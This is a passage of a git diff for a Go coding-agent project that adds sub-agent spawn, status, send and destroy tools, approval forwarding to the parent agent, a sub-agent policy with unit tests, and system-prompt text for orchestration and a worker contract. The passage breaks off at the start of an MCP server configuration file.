+	runCtx, cancel := context.WithTimeout(parentRunCtx, policy.TimeoutPerAgent)
+
+	// Create approval forwarder that bridges sub-agent approval to parent
+	var approvalHandler func(toolCallID, toolName string, args map[string]any) bool
+	if parentEventCh != nil {
+		approvalHandler = newApprovalForwarder(runCtx, parentID, parentEventCh)
+	}
+
+	a, err := t.manager.Create(AgentOptions{
+		ParentID:          parentID,
+		Mode:              mode,
+		WorkDir:           workDir,
+		Tools:             toolFilter,
+		SystemPromptExtra: extra,
+		MaxIterations:     maxIter,
+		ApprovalHandler:   approvalHandler,
+	})
+	if err != nil {
+		cancel()
+		return tools.ToolResult{}, fmt.Errorf("create sub-agent: %w", err)
+	}
+	t.manager.MarkRunning(a.ID())
+	t.manager.SetCancel(a.ID(), cancel)
+
+	// Start the sub-agent asynchronously, forward events to parent
+	go func() {
+		defer func() {
+			cancel()
+			t.manager.SetCancel(a.ID(), nil)
+		}()
+		ch := a.Run(runCtx, buildSubAgentTask(task))
+		for e := range ch {
+			// Forward approval events to parent so the UI can handle them
+			if e.Type == agentpkg.EventToolApprovalRequest && parentEventCh != nil {
+				_ = sendParentEvent(runCtx, parentEventCh, Event{
+					Type:         EventToolApprovalRequest,
+					AgentID:      a.ID(),
+					ApprovalID:   e.ApprovalID,
+					ApprovalTool: e.ApprovalTool,
+					ApprovalArgs: e.ApprovalArgs,
+				})
+			}
+			switch e.Type {
+			case agentpkg.EventDone:
+				t.manager.MarkDone(a.ID(), lastAssistantResponse(a))
+			case agentpkg.EventError:
+				t.manager.MarkError(a.ID(), e.Error)
+			}
+		}
+		if runCtx.Err() != nil {
+			if st, ok := t.manager.Status(a.ID()); !ok || st.State != "done" {
+				t.manager.MarkError(a.ID(), runCtx.Err())
+			}
+		}
+	}()
+
+	result := map[string]any{
+		"handle":  string(a.ID()),
+		"status":  "running",
+		"timeout": policy.TimeoutPerAgent.String(),
+	}
+	data, _ := json.Marshal(result)
+	return tools.NewTextToolResult(string(data)), nil
+}
+
+// newApprovalForwarder creates an ApprovalHandler that forwards sub-agent approval
+// requests to the parent agent's event channel and waits for a response.
+func newApprovalForwarder(ctx context.Context, parentID agentpkg.AgentID, parentEventCh chan<- Event) func(toolCallID, toolName string, args map[string]any) bool {
+	var mu sync.Mutex
+	counter := int64(0)
+	pending := make(map[string]chan bool)
+
+	return func(toolCallID, toolName string, args map[string]any) bool {
+		mu.Lock()
+		counter++
+		approvalID := fmt.Sprintf("sub-approval-%d", counter)
+		responseCh := make(chan bool, 1)
+		pending[approvalID] = responseCh
+		mu.Unlock()
+
+		// Forward approval request to parent's event channel.
+		if !sendParentEvent(ctx, parentEventCh, Event{
+			Type:         EventToolApprovalRequest,
+			AgentID:      parentID,
+			ApprovalID:   approvalID,
+			ApprovalTool: toolName,
+			ApprovalArgs: args,
+		}) {
+			mu.Lock()
+			delete(pending, approvalID)
+			mu.Unlock()
+			return false
+		}
+
+		// Wait for response (the parent TUI should call HandleSubAgentApprovalResponse)
+		var approved bool
+		select {
+		case approved = <-responseCh:
+		case <-ctx.Done():
+			approved = false
+		}
+
+		mu.Lock()
+		delete(pending, approvalID)
+		mu.Unlock()
+
+		return approved
+	}
+}
+
+func sendParentEvent(ctx context.Context, ch chan<- Event, ev Event) (ok bool) {
+	defer func() {
+		if r := recover(); r != nil {
+			log.Printf("[agent] sendParentEvent recovered from panic: %v (event type=%d)", r, ev.Type)
+			ok = false
+		}
+	}()
+	select {
+	case ch <- ev:
+		return true
+	case <-ctx.Done():
+		return false
+	}
+}
+
+// SubAgentStatusTool queries sub-agent status and results.
+type SubAgentStatusTool struct {
+	manager *AgentManager
+}
+
+func NewSubAgentStatusTool(m *AgentManager) *SubAgentStatusTool {
+	return &SubAgentStatusTool{manager: m}
+}
+
+func (t *SubAgentStatusTool) Name() string { return "subagent_status" }
+func (t *SubAgentStatusTool) Description() string {
+	return "Query the status and results of a sub-agent."
+}
+func (t *SubAgentStatusTool) PromptSnippet() string      { return "Check sub-agent status and get results" }
+func (t *SubAgentStatusTool) PromptGuidelines() []string { return nil }
+
+func (t *SubAgentStatusTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"handle": {"type": "string", "description": "The sub-agent handle ID"}
+		},
+		"required": ["handle"]
+	}`)
+}
+
+func (t *SubAgentStatusTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	handle, _ := params["handle"].(string)
+	if handle == "" {
+		return tools.ToolResult{}, fmt.Errorf("handle is required")
+	}
+
+	st, statusOK := t.manager.Status(agentpkg.AgentID(handle))
+	a, agentOK := t.manager.Get(agentpkg.AgentID(handle))
+	if !statusOK && !agentOK {
+		return tools.ToolResult{}, fmt.Errorf("sub-agent %q not found", handle)
+	}
+
+	status := st.State
+	if status == "" {
+		status = "unknown"
+	}
+	lastResponse := st.Result
+	messageCount := 0
+	if agentOK {
+		messages := a.GetMessages()
+		messageCount = len(messages)
+	}
+	if lastResponse == "" && agentOK {
+		lastResponse = lastAssistantResponse(a)
+	}
+
+	result := map[string]any{
+		"handle":        handle,
+		"status":        status,
+		"message_count": messageCount,
+	}
+	if lastResponse != "" {
+		result["last_response"] = lastResponse
+	}
+	if st.Error != "" {
+		result["error"] = st.Error
+	}
+	if !st.UpdatedAt.IsZero() {
+		result["updated_at"] = st.UpdatedAt.Format(time.RFC3339)
+	}
+
+	data, _ := json.Marshal(result)
+	return tools.NewTextToolResult(string(data)), nil
+}
+
+// SubAgentSendTool sends a follow-up message to a running sub-agent.
+type SubAgentSendTool struct {
+	manager *AgentManager
+}
+
+func NewSubAgentSendTool(m *AgentManager) *SubAgentSendTool {
+	return &SubAgentSendTool{manager: m}
+}
+
+func (t *SubAgentSendTool) Name() string { return "subagent_send" }
+func (t *SubAgentSendTool) Description() string {
+	return "Send a follow-up message to a running sub-agent."
+}
+func (t *SubAgentSendTool) PromptSnippet() string {
+	return "Send follow-up instructions to a sub-agent"
+}
+func (t *SubAgentSendTool) PromptGuidelines() []string { return nil }
+
+func (t *SubAgentSendTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"handle": {"type": "string", "description": "The sub-agent handle ID"},
+			"message": {"type": "string", "description": "The follow-up message"}
+		},
+		"required": ["handle", "message"]
+	}`)
+}
+
+func (t *SubAgentSendTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	handle, _ := params["handle"].(string)
+	message, _ := params["message"].(string)
+	if handle == "" || message == "" {
+		return tools.ToolResult{}, fmt.Errorf("handle and message are required")
+	}
+
+	a, ok := t.manager.Get(agentpkg.AgentID(handle))
+	if !ok {
+		return tools.ToolResult{}, fmt.Errorf("sub-agent %q not found", handle)
+	}
+
+	// Apply per-agent timeout for follow-up messages too
+	policy := DefaultSubAgentPolicy()
+	parentRunCtx, ok := ParentRunContextFromContext(ctx)
+	if !ok || parentRunCtx == nil {
+		parentRunCtx = context.Background()
+	}
+	runCtx, cancel := context.WithTimeout(parentRunCtx, policy.TimeoutPerAgent)
+	t.manager.MarkRunning(a.ID())
+	t.manager.SetCancel(a.ID(), cancel)
+
+	// Extract parent's event channel for approval forwarding
+	parentEventCh, _ := EventChanFromContext(ctx)
+
+	go func() {
+		defer func() {
+			cancel()
+			t.manager.SetCancel(a.ID(), nil)
+		}()
+		ch := a.Run(runCtx, message)
+		for e := range ch {
+			// Forward approval events to parent
+			if e.Type == agentpkg.EventToolApprovalRequest && parentEventCh != nil {
+				_ = sendParentEvent(runCtx, parentEventCh, Event{
+					Type:         EventToolApprovalRequest,
+					AgentID:      a.ID(),
+					ApprovalID:   e.ApprovalID,
+					ApprovalTool: e.ApprovalTool,
+					ApprovalArgs: e.ApprovalArgs,
+				})
+			}
+			switch e.Type {
+			case agentpkg.EventDone:
+				t.manager.MarkDone(a.ID(), lastAssistantResponse(a))
+			case agentpkg.EventError:
+				t.manager.MarkError(a.ID(), e.Error)
+			}
+		}
+		if runCtx.Err() != nil {
+			if st, ok := t.manager.Status(a.ID()); !ok || st.State != "done" {
+				t.manager.MarkError(a.ID(), runCtx.Err())
+			}
+		}
+	}()
+
+	return tools.NewTextToolResult(fmt.Sprintf(`{"handle":%q,"status":"message_sent"}`, handle)), nil
+}
+
+func buildSubAgentTask(task string) string {
+	task = strings.TrimSpace(task)
+	return fmt.Sprintf(`Delegated task:
+%s
+
+Return the artifact using this format:
+Result:
+Evidence:
+Changes:
+Risks:
+`, task)
+}
+
+func lastAssistantResponse(a agentpkg.Agent) string {
+	messages := a.GetMessages()
+	for i := len(messages) - 1; i >= 0; i-- {
+		if messages[i].Role == agentpkg.RoleAssistant {
+			if messages[i].Content != "" {
+				return messages[i].Content
+			}
+			var sb strings.Builder
+			for _, block := range messages[i].Contents {
+				if block.Type == "text" && block.Text != "" {
+					sb.WriteString(block.Text)
+				}
+			}
+			return sb.String()
+		}
+	}
+	return ""
+}
+
+// SubAgentDestroyTool destroys a sub-agent and releases resources.
+type SubAgentDestroyTool struct {
+	manager *AgentManager
+}
+
+func NewSubAgentDestroyTool(m *AgentManager) *SubAgentDestroyTool {
+	return &SubAgentDestroyTool{manager: m}
+}
+
+func (t *SubAgentDestroyTool) Name() string { return "subagent_destroy" }
+func (t *SubAgentDestroyTool) Description() string {
+	return "Destroy a sub-agent and release resources."
+}
+func (t *SubAgentDestroyTool) PromptSnippet() string      { return "Destroy a finished sub-agent" }
+func (t *SubAgentDestroyTool) PromptGuidelines() []string { return nil }
+
+func (t *SubAgentDestroyTool) Parameters() json.RawMessage {
+	return json.RawMessage(`{
+		"type": "object",
+		"properties": {
+			"handle": {"type": "string", "description": "The sub-agent handle ID"}
+		},
+		"required": ["handle"]
+	}`)
+}
+
+func (t *SubAgentDestroyTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
+	handle, _ := params["handle"].(string)
+	if handle == "" {
+		return tools.ToolResult{}, fmt.Errorf("handle is required")
+	}
+
+	if err := t.manager.Destroy(agentpkg.AgentID(handle)); err != nil {
+		return tools.ToolResult{}, fmt.Errorf("destroy sub-agent: %w", err)
+	}
+
+	return tools.NewTextToolResult(fmt.Sprintf(`{"handle":%q,"status":"destroyed"}`, handle)), nil
+}
+
+// SubAgentPolicy defines security constraints for sub-agents.
+type SubAgentPolicy struct {
+	MaxChildren     int           // Maximum number of sub-agents (default 5)
+	AllowedModes    []string      // Allowed modes for sub-agents (default ["agent"])
+	InheritSandbox  bool          // Inherit parent's sandbox (default true)
+	TimeoutPerAgent time.Duration // Per-agent timeout (default 10min)
+	TotalTimeout    time.Duration // Total timeout for all sub-agents (default 30min)
+}
+
+// DefaultSubAgentPolicy returns the default policy.
+func DefaultSubAgentPolicy() SubAgentPolicy {
+	return SubAgentPolicy{
+		MaxChildren:     5,
+		AllowedModes:    []string{"agent"},
+		InheritSandbox:  true,
+		TimeoutPerAgent: 10 * time.Minute,
+		TotalTimeout:    30 * time.Minute,
+	}
+}
+
+// Validate checks if a sub-agent creation request is allowed.
+func (p *SubAgentPolicy) Validate(parentID string, mode string, currentChildCount int) error {
+	if parentID == "" {
+		return nil
+	}
+	if currentChildCount >= p.MaxChildren {
+		return fmt.Errorf("maximum %d sub-agents allowed", p.MaxChildren)
+	}
+	allowed := false
+	for _, m := range p.AllowedModes {
+		if m == mode {
+			allowed = true
+			break
+		}
+	}
+	if !allowed {
+		return fmt.Errorf("mode %q is not allowed for sub-agents; allowed: %v", mode, p.AllowedModes)
+	}
+	return nil
+}
diff --git a/internal/agent/subagent_test.go b/internal/agent/subagent_test.go
new file mode 100644
index 0000000..b5ff783
--- /dev/null
+++ b/internal/agent/subagent_test.go
@@ -0,0 +1,447 @@
+package agent
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"testing"
+	"time"
+
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/sandbox"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+func newTestFactoryAndManager(t testing.TB) (*AgentFactory, *AgentManager) {
+	t.Helper()
+
+	mockProvider := provider.NewMockProvider("mock", []*provider.Model{
+		{ID: "model1", Name: "Model 1"},
+	}, nil)
+
+	sandboxMgr := sandbox.NewManager(t.TempDir())
+	sandboxMgr.SetLevel(sandbox.LevelNone)
+	settings := &config.Settings{SessionDir: t.TempDir()}
+
+	factory := NewAgentFactory(
+		mockProvider,
+		mockProvider.Models()[0],
+		settings,
+		sandboxMgr,
+		"",
+		ctxpkg.CompactionSettings{},
+		nil,
+	)
+	return factory, NewAgentManager(factory)
+}
+
+func TestSubAgentSpawnTool(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	tool := NewSubAgentSpawnTool(mgr)
+
+	if tool.Name() != "subagent_spawn" {
+		t.Errorf("expected 'subagent_spawn', got %q", tool.Name())
+	}
+
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"task": "list files",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	var parsed map[string]any
+	if err := json.Unmarshal([]byte(result.Text), &parsed); err != nil {
+		t.Fatalf("failed to parse result: %v", err)
+	}
+	if parsed["handle"] == nil || parsed["handle"] == "" {
+		t.Error("expected non-empty handle")
+	}
+	if parsed["status"] != "running" {
+		t.Errorf("expected 'running', got %q", parsed["status"])
+	}
+	handle, _ := parsed["handle"].(string)
+	waitForManagedAgentToStop(t, mgr, agentpkg.AgentID(handle))
+	if err := mgr.Destroy(agentpkg.AgentID(handle)); err != nil {
+		t.Fatalf("destroy spawned agent: %v", err)
+	}
+}
+
+func waitForManagedAgentToStop(t testing.TB, mgr *AgentManager, id agentpkg.AgentID) {
+	t.Helper()
+	deadline := time.Now().Add(time.Second)
+	for time.Now().Before(deadline) {
+		st, ok := mgr.Status(id)
+		if ok && (st.State == "done" || st.State == "error") {
+			return
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+	t.Fatalf("timed out waiting for agent %s to stop", id)
+}
+
+func TestSubAgentSpawnToolMissingTask(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	tool := NewSubAgentSpawnTool(mgr)
+
+	_, err := tool.Execute(context.Background(), map[string]any{})
+	if err == nil {
+		t.Fatal("expected error for missing task")
+	}
+}
+
+func TestSubAgentStatusTool(t *testing.T) {
+	factory, mgr := newTestFactoryAndManager(t)
+	_ = factory
+
+	// Create an agent manually
+	a, _ := mgr.Create(AgentOptions{ID: "test-agent"})
+
+	tool := NewSubAgentStatusTool(mgr)
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"handle": string(a.ID()),
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	var parsed map[string]any
+	json.Unmarshal([]byte(result.Text), &parsed)
+	if parsed["handle"] != "test-agent" {
+		t.Errorf("expected 'test-agent', got %q", parsed["handle"])
+	}
+}
+
+func TestSubAgentStatusToolNotFound(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	tool := NewSubAgentStatusTool(mgr)
+
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"handle": "nonexistent",
+	})
+	if err == nil {
+		t.Fatal("expected error for nonexistent agent")
+	}
+}
+
+func TestSubAgentStatusToolAfterParentFinish(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	mgr.Create(AgentOptions{ID: "main"})
+	mgr.Create(AgentOptions{ID: "sub-1", ParentID: "main"})
+	mgr.MarkDone("sub-1", "finished work")
+	mgr.Finish("main", nil)
+
+	tool := NewSubAgentStatusTool(mgr)
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"handle": "sub-1",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	var parsed map[string]any
+	if err := json.Unmarshal([]byte(result.Text), &parsed); err != nil {
+		t.Fatalf("failed to parse result: %v", err)
+	}
+	if parsed["status"] != "done" {
+		t.Fatalf("expected done status, got %q", parsed["status"])
+	}
+	if parsed["last_response"] != "finished work" {
+		t.Fatalf("expected retained response, got %q", parsed["last_response"])
+	}
+}
+
+func TestSubAgentStatusToolMissingHandle(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	tool := NewSubAgentStatusTool(mgr)
+
+	_, err := tool.Execute(context.Background(), map[string]any{})
+	if err == nil {
+		t.Fatal("expected error for missing handle")
+	}
+}
+
+func TestSubAgentSendTool(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	a, _ := mgr.Create(AgentOptions{ID: "test-agent"})
+
+	tool := NewSubAgentSendTool(mgr)
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"handle":  string(a.ID()),
+		"message": "do something",
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	var parsed map[string]any
+	json.Unmarshal([]byte(result.Text), &parsed)
+	if parsed["status"] != "message_sent" {
+		t.Errorf("expected 'message_sent', got %q", parsed["status"])
+	}
+}
+
+func TestSubAgentSendToolNotFound(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	tool := NewSubAgentSendTool(mgr)
+
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"handle":  "nonexistent",
+		"message": "test",
+	})
+	if err == nil {
+		t.Fatal("expected error")
+	}
+}
+
+func TestSubAgentSendToolMissingParams(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	tool := NewSubAgentSendTool(mgr)
+
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"handle": "x",
+	})
+	if err == nil {
+		t.Fatal("expected error for missing message")
+	}
+}
+
+func TestSubAgentDestroyTool(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	a, _ := mgr.Create(AgentOptions{ID: "to-destroy"})
+
+	tool := NewSubAgentDestroyTool(mgr)
+	result, err := tool.Execute(context.Background(), map[string]any{
+		"handle": string(a.ID()),
+	})
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+
+	var parsed map[string]any
+	json.Unmarshal([]byte(result.Text), &parsed)
+	if parsed["status"] != "destroyed" {
+		t.Errorf("expected 'destroyed', got %q", parsed["status"])
+	}
+
+	// Verify it's gone
+	if _, ok := mgr.Get("to-destroy"); ok {
+		t.Error("expected agent to be destroyed")
+	}
+}
+
+func TestSubAgentDestroyToolNotFound(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	tool := NewSubAgentDestroyTool(mgr)
+
+	_, err := tool.Execute(context.Background(), map[string]any{
+		"handle": "nonexistent",
+	})
+	if err == nil {
+		t.Fatal("expected error")
+	}
+}
+
+func TestSubAgentDestroyToolMissingHandle(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	tool := NewSubAgentDestroyTool(mgr)
+
+	_, err := tool.Execute(context.Background(), map[string]any{})
+	if err == nil {
+		t.Fatal("expected error for missing handle")
+	}
+}
+
+// --- SubAgentPolicy tests ---
+
+func TestSubAgentPolicyDefault(t *testing.T) {
+	p := DefaultSubAgentPolicy()
+	if p.MaxChildren != 5 {
+		t.Errorf("expected MaxChildren=5, got %d", p.MaxChildren)
+	}
+	if len(p.AllowedModes) != 1 || p.AllowedModes[0] != "agent" {
+		t.Errorf("expected AllowedModes=[agent], got %v", p.AllowedModes)
+	}
+}
+
+func TestSubAgentPolicyValidateTopLevel(t *testing.T) {
+	p := DefaultSubAgentPolicy()
+	// Top-level agents (no parent) are always allowed
+	if err := p.Validate("", "yolo", 0); err != nil {
+		t.Errorf("expected no error for top-level, got %v", err)
+	}
+}
+
+func TestSubAgentPolicyValidateAllowed(t *testing.T) {
+	p := DefaultSubAgentPolicy()
+	if err := p.Validate("parent", "agent", 0); err != nil {
+		t.Errorf("expected no error, got %v", err)
+	}
+}
+
+func TestSubAgentPolicyValidateMaxChildren(t *testing.T) {
+	p := DefaultSubAgentPolicy()
+	err := p.Validate("parent", "agent", 5)
+	if err == nil {
+		t.Fatal("expected error for max children")
+	}
+}
+
+func TestSubAgentPolicyValidateDisallowedMode(t *testing.T) {
+	p := DefaultSubAgentPolicy()
+	err := p.Validate("parent", "yolo", 0)
+	if err == nil {
+		t.Fatal("expected error for disallowed mode")
+	}
+}
+
+func TestSubAgentPolicyValidateCustom(t *testing.T) {
+	p := SubAgentPolicy{
+		MaxChildren:  3,
+		AllowedModes: []string{"agent", "plan"},
+	}
+	if err := p.Validate("parent", "plan", 1); err != nil {
+		t.Errorf("expected no error, got %v", err)
+	}
+	if err := p.Validate("parent", "yolo", 0); err == nil {
+		t.Error("expected error for yolo")
+	}
+	if err := p.Validate("parent", "agent", 3); err == nil {
+		t.Error("expected error for max children")
+	}
+}
+
+func TestSubAgentPromptContractOnlyForChild(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	parent, err := mgr.Create(AgentOptions{ID: "main"})
+	if err != nil {
+		t.Fatalf("create parent: %v", err)
+	}
+	child, err := mgr.Create(AgentOptions{ID: "sub-1", ParentID: parent.ID()})
+	if err != nil {
+		t.Fatalf("create child: %v", err)
+	}
+
+	parentCtx := parent.GetContext()
+	if parentCtx == nil || !contains(parentCtx.SystemPrompt, "Sub-Agent Tools") {
+		t.Fatal("expected top-level multi-agent prompt to include orchestration guidance")
+	}
+	if contains(parentCtx.SystemPrompt, "Sub-Agent Operating Contract") {
+		t.Error("expected top-level prompt to omit worker contract")
+	}
+
+	childCtx := child.GetContext()
+	if childCtx == nil || !contains(childCtx.SystemPrompt, "Sub-Agent Operating Contract") {
+		t.Fatal("expected child prompt to include worker contract")
+	}
+	if contains(childCtx.SystemPrompt, "Sub-Agent Tools") {
+		t.Error("expected child prompt to omit sub-agent tools guidance")
+	}
+}
+
+func TestAgentManagerEnforcesSubAgentPolicy(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+	parent, err := mgr.Create(AgentOptions{ID: "main"})
+	if err != nil {
+		t.Fatalf("create parent: %v", err)
+	}
+
+	for i := 0; i < DefaultSubAgentPolicy().MaxChildren; i++ {
+		_, err := mgr.Create(AgentOptions{
+			ID:       agentpkg.AgentID(fmt.Sprintf("sub-%d", i)),
+			ParentID: parent.ID(),
+			Mode:     "agent",
+		})
+		if err != nil {
+			t.Fatalf("create child %d: %v", i, err)
+		}
+	}
+
+	_, err = mgr.Create(AgentOptions{ID: "sub-overflow", ParentID: parent.ID(), Mode: "agent"})
+	if err == nil {
+		t.Fatal("expected max-children error")
+	}
+
+	_, mgr = newTestFactoryAndManager(t)
+	parent, _ = mgr.Create(AgentOptions{ID: "main"})
+	_, err = mgr.Create(AgentOptions{ID: "sub-yolo", ParentID: parent.ID(), Mode: "yolo"})
+	if err == nil {
+		t.Fatal("expected disallowed mode error")
+	}
+}
+
+// --- Tool interface compliance ---
+
+func TestSubAgentToolsImplementToolInterface(t *testing.T) {
+	var _ tools.Tool = (*SubAgentSpawnTool)(nil)
+	var _ tools.Tool = (*SubAgentStatusTool)(nil)
+	var _ tools.Tool = (*SubAgentSendTool)(nil)
+	var _ tools.Tool = (*SubAgentDestroyTool)(nil)
+}
+
+func TestSubAgentToolsDescriptions(t *testing.T) {
+	_, mgr := newTestFactoryAndManager(t)
+
+	tools := []tools.Tool{
+		NewSubAgentSpawnTool(mgr),
+		NewSubAgentStatusTool(mgr),
+		NewSubAgentSendTool(mgr),
+		NewSubAgentDestroyTool(mgr),
+	}
+
+	for _, tool := range tools {
+		if tool.Name() == "" {
+			t.Errorf("tool %T has empty name", tool)
+		}
+		if tool.Description() == "" {
+			t.Errorf("tool %s has empty description", tool.Name())
+		}
+		if tool.Parameters() == nil {
+			t.Errorf("tool %s has nil parameters", tool.Name())
+		}
+	}
+}
+
+// TestSendParentEvent_ClosedChannel verifies sendParentEvent does not panic
+// when the channel is closed (recover logs and returns false).
+func TestSendParentEvent_ClosedChannel(t *testing.T) {
+	ch := make(chan Event, 1)
+	close(ch)
+
+	ev := Event{Type: EventStatus, StatusMessage: "test"}
+	ok := sendParentEvent(context.Background(), ch, ev)
+	if ok {
+		t.Error("expected sendParentEvent to return false on closed channel")
+	}
+}
+
+// TestSendParentEvent_ContextCanceled verifies sendParentEvent returns false
+// when the context is canceled and the channel is full (unbuffered, never read).
+func TestSendParentEvent_ContextCanceled(t *testing.T) {
+	ch := make(chan Event) // unbuffered — will block until context cancels
+	ctx, cancel := context.WithCancel(context.Background())
+	cancel() // cancel immediately
+
+	ev := Event{Type: EventStatus, StatusMessage: "test"}
+	ok := sendParentEvent(ctx, ch, ev)
+	if ok {
+		t.Error("expected sendParentEvent to return false on canceled context")
+	}
+}
+
+// TestSendParentEvent_Success verifies sendParentEvent succeeds normally.
+func TestSendParentEvent_Success(t *testing.T) {
+	ch := make(chan Event, 1)
+	ev := Event{Type: EventStatus, StatusMessage: "test"}
+	ok := sendParentEvent(context.Background(), ch, ev)
+	if !ok {
+		t.Error("expected sendParentEvent to return true on success")
+	}
+	received := <-ch
+	if received.StatusMessage != "test" {
+		t.Errorf("expected 'test', got %q", received.StatusMessage)
+	}
+}
diff --git a/internal/agent/system_prompt.go b/internal/agent/system_prompt.go
index 218863d..55fa937 100644
--- a/internal/agent/system_prompt.go
+++ b/internal/agent/system_prompt.go
@@ -9,7 +9,7 @@ import (
 )
 
 // BuildSystemPrompt constructs the system prompt based on mode and context.
-func BuildSystemPrompt(mode string, toolNames []string, cwd string, extraContext string, toolSnippets map[string]string, toolGuidelines []string) string {
+func BuildSystemPrompt(mode string, toolNames []string, cwd string, extraContext string, toolSnippets map[string]string, toolGuidelines []string, multiAgent bool) string {
 	var sb strings.Builder
 
 	// Get platform-specific shell
@@ -50,6 +50,7 @@ You are in READ-ONLY mode. You can analyze code and create plans but CANNOT modi
 
 Permissions:
 - READ: ✅ (read, grep, find, ls)
+- PLAN: ✅
 - WRITE: ❌
 - EDIT: ❌
 - BASH: ❌
@@ -75,17 +76,19 @@ You can read/write files and execute commands to accomplish tasks.
 
 Permissions:
 - READ: ✅ Auto-execute
-- WRITE: ✅ Auto-execute
-- EDIT: ✅ Auto-execute
+- PLAN: ✅ Auto-execute
+- WRITE: ⚠️ Requires user approval when write confirmation is enabled
+- EDIT: ⚠️ Requires user approval when write confirmation is enabled
 - BASH: ⚠️ Requires user approval (unless whitelisted)
 
 Best practices:
+- Use the plan tool before making multi-step code changes, and update the plan as steps move from pending to running to done or failed
 - Read files before modifying them to understand context
 - Use the edit tool for precise, targeted changes
 - Use the write tool for new files or complete rewrites
 - Verify your changes work when possible
 - Explain your reasoning as you work
-- Wait for user approval before executing bash commands
+- Wait for user approval before executing bash commands or applying write/edit changes when confirmation is requested
 `)
 
 	case "yolo":
@@ -94,6 +97,7 @@ You have unrestricted system access. Execute tasks efficiently without asking fo
 
 Permissions:
 - READ: ✅ Auto-execute
+- PLAN: ✅ Auto-execute
 - WRITE: ✅ Auto-execute
 - EDIT: ✅ Auto-execute
 - BASH: ✅ Auto-execute
@@ -129,6 +133,29 @@ Focus on getting the task done quickly and correctly.
 
 	// Behavior guidelines are now included in the Guidelines section above
 
+	// Sub-Agent section (Decision 8: only in multi-agent mode)
+	if multiAgent {
+		sb.WriteString(`
+## Sub-Agent Tools
+You can delegate bounded, independent subtasks to sub-agents using these tools:
+- subagent_spawn: Create and start a sub-agent for a subtask (returns handle)
+- subagent_status: Check sub-agent status and get results
+- subagent_send: Send follow-up instructions to a running sub-agent
+- subagent_destroy: Destroy a finished sub-agent to release resources
+
+Act as the orchestrator:
+- Keep the final answer and user-facing decisions in the main agent
+- Spawn sub-agents only for work that can be described with clear scope, expected output, and stop conditions
+- Prefer parallel sub-agents for independent research, codebase inspection, test investigation, or review tasks
+- Avoid delegation for tiny, sequential, highly stateful, or ambiguous work where coordination costs exceed the benefit
+- Give each sub-agent one focused task, relevant paths/context, allowed tools if useful, and the exact artifact you need back
+- Poll sub-agents with subagent_status, reconcile their outputs yourself, verify important claims before acting, and destroy finished agents
+- Do not assume sub-agent output is correct; treat it as evidence to review
+
+Sub-agents run independently with isolated context and tools. They cannot create nested sub-agents.
+`)
+	}
+
 	// Append extra context from files and skills
 	if extraContext != "" {
 		sb.WriteString("\n## Context from project files\n")
@@ -139,6 +166,22 @@ Focus on getting the task done quickly and correctly.
 	return sb.String()
 }
 
+// BuildSubAgentContext returns extra system context for sub-agents.
+func BuildSubAgentContext() string {
+	return `
+## Sub-Agent Operating Contract
+You are a worker sub-agent. Execute only the delegated task, stay within the requested scope, and do not broaden the objective.
+
+Report back with:
+- Result: the direct answer or completed change
+- Evidence: files inspected, commands run, tests/checks performed, and relevant outputs summarized
+- Changes: files modified, if any
+- Risks: assumptions, uncertainty, and follow-up needed
+
+Stop when the delegated artifact is ready, blocked, or unsafe to continue. Do not ask the user directly unless the task explicitly requires it.
+`
+}
+
 // formatToolListWithSnippets formats the tool list with snippets for the system prompt.
 func formatToolListWithSnippets(toolNames []string, snippets map[string]string) string {
 	if len(toolNames) == 0 {
diff --git a/internal/config/mcp.go b/internal/config/mcp.go
new file mode 100644
index 0000000..44df57e
--- /dev/null
+++ b/internal/config/mcp.go
@@ -0,0 +1,145 @@
+package config
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+)
+
+// MCPServer defines one MCP server entry in mcp.json.
+type MCPServer struct {
+	Name       string `json:"name"`
+	Type       string `json:"type,omitempty"`
+	Command    string `json:"command,omitempty"`
+	URL        string `json:"url,omitempty"`
+	MessageURL string `json:"messageUrl,omitempty"`
+	Args       []string `json:"args,omitempty"`
+	Headers    []struct {
+		Name  string `json:"name"`
+		Value string `json:"value"`
+	} `json:"headers,omitempty"`
+	Env []struct {
+		Name  string `json:"name"`
+		Value string `json:"value"`
